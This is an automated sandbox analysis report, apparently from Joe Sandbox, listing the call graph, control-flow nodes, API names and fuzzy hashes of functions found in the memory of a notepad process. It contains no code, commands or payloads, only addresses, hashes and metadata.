                    callgraph 0 Function_000001D112FC9CAB 98 Function_000001D112FCC2D7 0->98 1 Function_000001D112FCC5A6 69 Function_000001D112FCE423 1->69 2 Function_00007FFD3498000A 3 Function_000001D112FCD1A1 4 Function_000001D112FCDFA1 4->1 27 Function_000001D112FCCE6D 4->27 41 Function_000001D112FCC45C 4->41 74 Function_000001D112FCE408 4->74 113 Function_000001D112FCE8B4 4->113 5 Function_000001D112FCC29F 6 Function_000001D112FCA79B 7 Function_000001D112FCE696 28 Function_000001D112FCE86D 7->28 52 Function_000001D112FCE839 7->52 8 Function_000001D112FCE595 9 Function_000001D112FCC591 10 Function_000001D112FCD191 11 Function_000001D112FCA193 84 Function_000001D112FCBDF7 11->84 12 Function_000001D112FCC694 12->113 13 Function_000001D112FCC78D 14 Function_000001D112FCE890 13->14 13->69 15 Function_000001D112FCC68F 16 Function_000001D112FCA487 17 Function_000001D112FCCB82 30 Function_000001D112FCE470 17->30 18 Function_000001D112FCBD83 18->11 19 Function_000001D112FCC784 20 Function_00007FFD349801F2 21 Function_00007FFD349801F0 22 Function_000001D112FCD179 23 Function_000001D112FCBD77 24 Function_000001D112FCC778 25 Function_000001D112FCA473 26 Function_000001D112FCC873 26->14 26->69 27->69 27->74 28->52 29 Function_000001D112FCC76E 55 Function_000001D112FCE532 30->55 30->113 31 Function_000001D112FCBD6F 32 Function_000001D112FCA867 33 Function_000001D112FCC762 34 Function_000001D112FCE164 34->14 72 Function_000001D112FCD215 34->72 35 Function_000001D112FCBD63 36 Function_000001D112FCDB60 36->14 36->34 36->74 103 Function_000001D112FCE8C9 36->103 36->113 114 Function_000001D112FCD1B4 36->114 37 Function_000001D112FCC959 37->8 37->30 37->113 38 Function_000001D112FCC05B 38->5 39 Function_000001D112FCB35B 73 Function_000001D112FCC313 39->73 83 Function_000001D112FCC2F7 39->83 91 Function_000001D112FCBADF 39->91 94 Function_000001D112FCA7DB 39->94 39->98 40 Function_000001D112FCA35B 41->69 42 Function_000001D112FCD256 42->74 43 Function_00007FFD34980C5A 44 Function_000001D112FCC454 45 Function_000001D112FCC445 46 Function_000001D112FCD448 46->4 46->7 46->8 46->13 46->14 46->26 46->30 46->36 46->37 46->42 56 Function_000001D112FCD832 46->56 61 Function_000001D112FCCD2E 46->61 62 Function_000001D112FCE42D 46->62 46->113 47 Function_000001D112FCC547 48 Function_000001D112FCCE47 49 Function_000001D112FCC542 50 Function_000001D112FCBF3F 51 Function_000001D112FC0039 53 Function_00007FFD34980B2D 70 Function_00007FFD34980190 53->70 54 Function_000001D112FCA437 56->74 57 Function_000001D112FCC532 58 Function_000001D112FCC333 58->46 58->62 58->69 59 Function_00007FFD34980836 60 Function_000001D112FC012D 62->17 63 Function_000001D112FCCE2D 64 Function_000001D112FCA72B 65 Function_000001D112FCE428 66 Function_00007FFD34980589 76 Function_00007FFD34980168 66->76 86 Function_00007FFD349800C8 66->86 87 Function_00007FFD349801C8 66->87 67 Function_00007FFD34980188 68 Function_000001D112FCAF23 69->65 71 Function_000001D112FCA415 75 Function_000001D112FCD108 77 Function_000001D112FCAB03 77->0 77->18 77->38 77->39 77->40 77->50 77->68 77->83 77->84 88 Function_000001D112FCB7E3 77->88 95 Function_000001D112FC9EDB 77->95 77->98 108 Function_000001D112FC9DC3 77->108 110 Function_000001D112FCA8BB 77->110 78 Function_000001D112FCCE03 79 Function_000001D112FCE3FE 80 Function_00007FFD34980270 105 Function_00007FFD3498029E 80->105 81 Function_000001D112FCCDFB 82 Function_000001D112FCE3F5 84->83 104 Function_000001D112FCBECB 84->104 85 Function_000001D112FCE3E6 88->83 96 Function_000001D112FCA4DB 88->96 89 Function_000001D112FCC6E4 90 Function_00007FFD349801D3 91->32 91->98 92 Function_000001D112FCC6DF 93 Function_000001D112FCCDDF 94->73 95->50 95->83 95->84 97 Function_00007FFD349800CD 99 Function_000001D112FCCDD7 100 Function_000001D112FCC4D3 101 Function_00007FFD34980CA2 102 Function_000001D112FCCDCF 106 Function_000001D112FCA7C7 107 Function_00007FFD349809A9 107->21 107->67 108->98 109 Function_000001D112FCCDC0 111 Function_000001D112FCA7BB 112 Function_000001D112FC9CB8 112->98 114->103

                    Executed Functions

                    Function 000001D112FCAB03 Relevance: 4.9, APIs: 3, Instructions: 406memorylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 34 1d112fcab03-1d112fcab59 call 1d112fcbd83 * 3 41 1d112fcab90 34->41 42 1d112fcab5b-1d112fcab5e 34->42 44 1d112fcab93-1d112fcabad 41->44 42->41 43 1d112fcab60-1d112fcab63 42->43 43->41 45 1d112fcab65-1d112fcab80 VirtualAlloc 43->45 46 1d112fcabae-1d112fcabd9 call 1d112fcc2d7 call 1d112fcc2f7 45->46 47 1d112fcab82-1d112fcab89 45->47 53 1d112fcabdb-1d112fcac10 call 1d112fcbf3f call 1d112fcbdf7 46->53 54 1d112fcac16-1d112fcac2d call 1d112fcbd83 46->54 47->41 49 1d112fcab8b-1d112fcab8d 47->49 49->41 53->54 63 1d112fcaead-1d112fcaeb9 53->63 54->41 60 1d112fcac33-1d112fcac34 54->60 62 1d112fcac3a-1d112fcac40 60->62 64 1d112fcac82-1d112fcac8c 62->64 65 1d112fcac42 62->65 66 1d112fcaeef-1d112fcaf13 call 1d112fcc2f7 VirtualFree 63->66 67 1d112fcaebb-1d112fcaec5 63->67 68 1d112fcac8e-1d112fcaca9 call 1d112fcbd83 64->68 69 1d112fcacba-1d112fcacc3 64->69 70 1d112fcac44-1d112fcac46 65->70 89 1d112fcaf1a-1d112fcaf1c 66->89 90 1d112fcaf15-1d112fcaf17 66->90 67->66 73 1d112fcaec7-1d112fcaee8 call 1d112fcc2f7 67->73 68->63 88 1d112fcacaf-1d112fcacb8 68->88 76 1d112fcacde-1d112fcace1 69->76 77 1d112fcacc5-1d112fcaccf call 1d112fc9edb 69->77 71 1d112fcac48-1d112fcac4e 70->71 72 1d112fcac63-1d112fcac65 70->72 71->72 78 1d112fcac50-1d112fcac61 71->78 72->64 79 1d112fcac67-1d112fcac80 LoadLibraryA 72->79 73->66 76->63 84 1d112fcace7-1d112fcacf1 76->84 77->63 94 1d112fcacd5-1d112fcacdc 77->94 78->70 78->72 79->62 85 1d112fcacfb-1d112fcad02 84->85 86 1d112fcacf3-1d112fcacf4 84->86 92 1d112fcad36-1d112fcad3a 85->92 93 1d112fcad04-1d112fcad05 85->93 86->85 88->68 88->69 89->44 90->89 97 1d112fcad40-1d112fcad62 92->97 98 1d112fcae48-1d112fcae50 92->98 95 1d112fcad07 call 1d112fc9cab 93->95 94->85 101 1d112fcad0c-1d112fcad0e 95->101 97->63 111 1d112fcad68-1d112fcad7f call 1d112fcc2d7 97->111 99 1d112fcaea2-1d112fcaea8 call 1d112fcb35b 98->99 100 1d112fcae52-1d112fcae58 98->100 99->63 102 1d112fcae6f-1d112fcae81 call 1d112fca8bb 100->102 103 1d112fcae5a-1d112fcae60 100->103 104 1d112fcad1d-1d112fcad20 call 1d112fc9dc3 101->104 105 1d112fcad10-1d112fcad17 101->105 118 1d112fcae93-1d112fcaea0 call 1d112fca35b 102->118 119 1d112fcae83-1d112fcae8e call 1d112fcaf23 102->119 103->63 108 1d112fcae62-1d112fcae6d call 1d112fcb7e3 103->108 114 1d112fcad25-1d112fcad27 104->114 105->63 105->104 108->63 121 1d112fcad81-1d112fcad84 111->121 122 1d112fcada2-1d112fcadc9 111->122 114->92 120 1d112fcad29-1d112fcad30 114->120 118->63 119->118 120->63 120->92 121->98 125 1d112fcad8a-1d112fcad9d call 1d112fcc05b 121->125 122->63 130 1d112fcadcf-1d112fcae43 122->130 131 1d112fcae45-1d112fcae46 125->131 130->63 130->131 131->98
                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFreeLibraryLoad
                    • String ID:
                    • API String ID: 2147011437-0
                    • Opcode ID: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                    • Instruction ID: fc3378705cc53745efcabb586dd0aa259ef5c349483ccf38c60dd18a09dc15fe
                    • Opcode Fuzzy Hash: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                    • Instruction Fuzzy Hash: 6AD19B70214A09ABE769EF39C4D6BFA73D1FB98301F14052ED58BC3186DA31F8568781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D112FCAF23 Relevance: .4, Instructions: 409COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 228 1d112fcaf23-1d112fcaf73 229 1d112fcaf79-1d112fcaf8c 228->229 230 1d112fcb171-1d112fcb1af 228->230 233 1d112fcb168-1d112fcb16c 229->233 234 1d112fcaf92-1d112fcafa6 229->234 237 1d112fcb340-1d112fcb35a 230->237 238 1d112fcb1b5-1d112fcb1e4 230->238 236 1d112fcb33d-1d112fcb33e 233->236 234->236 240 1d112fcafac-1d112fcafdd 234->240 236->237 244 1d112fcb32e-1d112fcb338 238->244 245 1d112fcb1ea-1d112fcb20b 238->245 247 1d112fcb111-1d112fcb13c 240->247 248 1d112fcafe3-1d112fcb001 240->248 244->236 252 1d112fcb325-1d112fcb326 245->252 253 1d112fcb211-1d112fcb21d 245->253 251 1d112fcb146-1d112fcb149 247->251 258 1d112fcb0a7-1d112fcb0ed 248->258 259 1d112fcb007-1d112fcb064 248->259 251->236 255 1d112fcb14f-1d112fcb163 251->255 252->244 256 1d112fcb2c9-1d112fcb2cc 253->256 257 1d112fcb223-1d112fcb263 253->257 255->236 260 1d112fcb2ce-1d112fcb315 256->260 261 1d112fcb320-1d112fcb321 256->261 257->256 276 1d112fcb265-1d112fcb271 257->276 275 1d112fcb0f5-1d112fcb109 258->275 277 1d112fcb0ef-1d112fcb0f0 259->277 278 1d112fcb06a-1d112fcb06b 259->278 260->261 269 1d112fcb317-1d112fcb318 260->269 261->252 269->261 275->247 276->256 279 1d112fcb273-1d112fcb279 276->279 277->275 280 1d112fcb06e-1d112fcb0a0 278->280 281 1d112fcb27c-1d112fcb2a7 279->281 286 1d112fcb0a2-1d112fcb0a5 280->286 287 1d112fcb2a9-1d112fcb2b2 281->287 288 1d112fcb2b4-1d112fcb2c7 281->288 286->275 287->288 288->256 288->281
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                    • Instruction ID: 07f7739ebd9597051441f61cc60c1788aa37ae867f1dba64ca0d86ac27e93163
                    • Opcode Fuzzy Hash: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                    • Instruction Fuzzy Hash: 76E15C71508B488BDB59DF28C889AEAB7E1FF94310F14462EE84BC7255EF30E956CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D112FC9DC3 Relevance: 7.6, APIs: 5, Instructions: 125memorylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                    • Instruction ID: 953efa8875cdb303de78be08395d9bb5167408dcf2ce315203341b13c2afc715
                    • Opcode Fuzzy Hash: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                    • Instruction Fuzzy Hash: 0631C87130CA099FDB48AA6CD8867EA73D5EBD4710F04015AED8BC3289DE74DD4287D1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D112FC9CB8 Relevance: 7.6, APIs: 5, Instructions: 115memorylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                    • Instruction ID: 6f02e40f9392e3b23826b620b7b04cd68eab66462efe62cce28d33bc3a56b11a
                    • Opcode Fuzzy Hash: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                    • Instruction Fuzzy Hash: 4431C731308A099FDB58AA6C98967E973D1F7D4720F00025ADD4BD32C9DD74ED2187C6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D112FCA8BB Relevance: 3.2, APIs: 2, Instructions: 236memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 1d112fca8bb-1d112fca8f5 136 1d112fca8fb-1d112fca90e CLRCreateInstance 135->136 137 1d112fca9b5-1d112fca9b7 135->137 138 1d112fca98d-1d112fca98e 136->138 139 1d112fca910-1d112fca94a 136->139 140 1d112fca9b9-1d112fca9bf 137->140 141 1d112fca9c4-1d112fca9d0 137->141 142 1d112fca990-1d112fca992 138->142 150 1d112fca94c-1d112fca95f 139->150 151 1d112fca988-1d112fca98b 139->151 143 1d112fcaae7-1d112fcab02 140->143 147 1d112fca9d6-1d112fcaa25 SysAllocString 141->147 148 1d112fcaae4-1d112fcaae5 141->148 142->141 144 1d112fca994-1d112fca9ad 142->144 144->137 147->148 158 1d112fcaa2b-1d112fcaa41 147->158 148->143 150->144 155 1d112fca961-1d112fca969 150->155 151->142 155->142 156 1d112fca96b-1d112fca981 155->156 159 1d112fca986 156->159 158->148 161 1d112fcaa47-1d112fcaa78 158->161 159->142 161->148 163 1d112fcaa7a-1d112fcaa86 161->163 164 1d112fcaa9d-1d112fcaaa9 163->164 165 1d112fcaa88-1d112fcaa9b 163->165 166 1d112fcaab1-1d112fcaac3 164->166 165->164 165->165 167 1d112fcaadb-1d112fcaadc 166->167 168 1d112fcaac5-1d112fcaad9 166->168 167->148 168->167 168->168
                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocCreateInstanceString
                    • String ID:
                    • API String ID: 218245030-0
                    • Opcode ID: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                    • Instruction ID: 17c423113d09393e17e715503c907d5ab3f0b00b38e3535bfb01b3e60b25790a
                    • Opcode Fuzzy Hash: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                    • Instruction Fuzzy Hash: 99816D30208A09DFDB68EF38C889BE6B7E1FF95301F004A6ED59BC7151EA31E5498B41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D112FC9CAB Relevance: 1.5, APIs: 1, Instructions: 35memorylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                    • Instruction ID: 216b28c94a9541f120ff7c176920145de87635fd9d49647182a56004f2429079
                    • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                    • Instruction Fuzzy Hash: 44E0483120CA1E6FF758969DD88A7F666D8D796375F00106FE64AC2141E055D8A24391
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD349800CD Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID: _
                    • API String ID: 0-701932520
                    • Opcode ID: 2ff20880ef1182d9df52cddda82add215d81d5c90008b41502847e4f6853a86a
                    • Instruction ID: ecb6c6b0c5f59b3199432ef04dbf89aa34895df7b7652f038bd95f2ac67daae7
                    • Opcode Fuzzy Hash: 2ff20880ef1182d9df52cddda82add215d81d5c90008b41502847e4f6853a86a
                    • Instruction Fuzzy Hash: 81610D22B0D6450FE7A4EBBCA4B61F977D5EF86324B0901BBD08DC7197DD68A8468381
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD34980589 Relevance: .3, Instructions: 280COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8281cf1039e0caf15cedac515c54a22b98ba24e28a2b54d7ff7133e19204f5d8
                    • Instruction ID: 59e8701e5abccb51d41c186040db1ffa84f450edbc312dec9ab918b380fe2b84
                    • Opcode Fuzzy Hash: 8281cf1039e0caf15cedac515c54a22b98ba24e28a2b54d7ff7133e19204f5d8
                    • Instruction Fuzzy Hash: 5991F530B0DB890FE79AEB7C84751693BA1EF86244B8641BED04ED71E3DD2D6C068751
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD34980CA2 Relevance: .2, Instructions: 225COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 344 7ffd34980ca2-7ffd34980d44 352 7ffd34980d4d-7ffd34980d51 344->352 353 7ffd34980d46-7ffd34980d4b 344->353 354 7ffd34980d54-7ffd34980d6e 352->354 353->354 356 7ffd34980d70-7ffd34980da7 354->356 357 7ffd34980dad-7ffd34980df3 354->357 364 7ffd34980df4-7ffd34980e53 356->364 365 7ffd34980da9-7ffd34980dab 356->365 371 7ffd34980e5a-7ffd34980e8c 364->371 365->356 365->357
                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5c364016024997bcc7cf7f25636d160d0c816957aadae2bbb05145fec3b772d
                    • Instruction ID: 0006cabb0e3c82738f4002aadaf567d76664a737fbafc453881b146e08d00998
                    • Opcode Fuzzy Hash: f5c364016024997bcc7cf7f25636d160d0c816957aadae2bbb05145fec3b772d
                    • Instruction Fuzzy Hash: BB61F521B0DB850FE396A77C846A2797BD1EF87210B4A40FED489C71E7DC1DAC428362
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD34980836 Relevance: .2, Instructions: 164COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4814c77d81602a1d3b69b8a2be58bc4daade07812e6745245bd1f7617b12eb30
                    • Instruction ID: a684a8cf2a02985d9cf0f93ef0ca74a909cb39c6ae71dd93f6c2bb7cd4f44af9
                    • Opcode Fuzzy Hash: 4814c77d81602a1d3b69b8a2be58bc4daade07812e6745245bd1f7617b12eb30
                    • Instruction Fuzzy Hash: 9A41E62170DA890FE795E77C94692797BD6EF9A210B0901FFE04DC72A3CD589C468351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD349809A9 Relevance: .2, Instructions: 160COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 66c3f1782655448956dad1d9cf98989b01f16b6c2a81069204f28cb7ddcf80cb
                    • Instruction ID: 193f6f51db58f8b58515985e6e7d6bedf36d4152137c41c8062329ec8ea744bb
                    • Opcode Fuzzy Hash: 66c3f1782655448956dad1d9cf98989b01f16b6c2a81069204f28cb7ddcf80cb
                    • Instruction Fuzzy Hash: E651C434A09A498FE746EBBCC4756A97BB1FF4A304F9941B9D409E72E3DD396801C720
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD349800C8 Relevance: .1, Instructions: 141COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 420 7ffd349800c8-7ffd349809a4
                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 608fef857235c4063fe4c7742851995f5462e39e9cab3dba9f9047c1a558b088
                    • Instruction ID: 6c555eedf3b10b341c573038cf590ae2db6df6bde88c04681f3ef4608c2d7f43
                    • Opcode Fuzzy Hash: 608fef857235c4063fe4c7742851995f5462e39e9cab3dba9f9047c1a558b088
                    • Instruction Fuzzy Hash: 4131B521B1CA490FF798EB6C946A27976D6EFDA315F0501BEE04ED32E3DD689C418381
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD34980B2D Relevance: .1, Instructions: 125COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 441 7ffd34980b2d-7ffd34980c44 call 7ffd34980190 463 7ffd34980c49-7ffd34980c59 441->463
                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2999b7521abdf909fbed75f3e5b2e60dfc02d5cf263f04880cfb66fd989c12b5
                    • Instruction ID: 9a7ff8498b5f67e992eaba48b75670f1c93dbc9d9ede982899ec094ee439aceb
                    • Opcode Fuzzy Hash: 2999b7521abdf909fbed75f3e5b2e60dfc02d5cf263f04880cfb66fd989c12b5
                    • Instruction Fuzzy Hash: 5B318321B18A4A4FEB94B7BC486A3BD77E6EF99701F15017AE40DD32D3DE28A8418351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 000001D112FCB35B Relevance: .5, Instructions: 500COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                    • Instruction ID: 305cd06a2db4dbb70ebff887cf0b79b9468f25455ffe2602fbcdcf8a4a81a2d0
                    • Opcode Fuzzy Hash: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                    • Instruction Fuzzy Hash: 73F19774618A0EABDB68DF38C886BF5B3D1FB54311F14452ED99BC3291EB34E8129781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D112FCB7E3 Relevance: .3, Instructions: 283COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                    • Instruction ID: 40ffc4e42711a71d8ffe9a6306de6574e0154c2ce86eab4f3207e8f513a20f4c
                    • Opcode Fuzzy Hash: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                    • Instruction Fuzzy Hash: 85A12D71608A0C8FDB55EF28C889BEA77E5FBA8315F10462FE84AC7160EB30D655CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000001D112FC9EDB Relevance: .3, Instructions: 257COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                    • Instruction ID: 41a0e9fe3f1e6a4751b8df877f28eb47a438aee33fefe8e3ddc1bbee64d63d8d
                    • Opcode Fuzzy Hash: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                    • Instruction Fuzzy Hash: 8B815771618B499BEB68DF34C88ABEAB7D4FB58301F00462E959BC3241EF34E5558BC1
                    Uniqueness

                    Uniqueness Score: -1.00%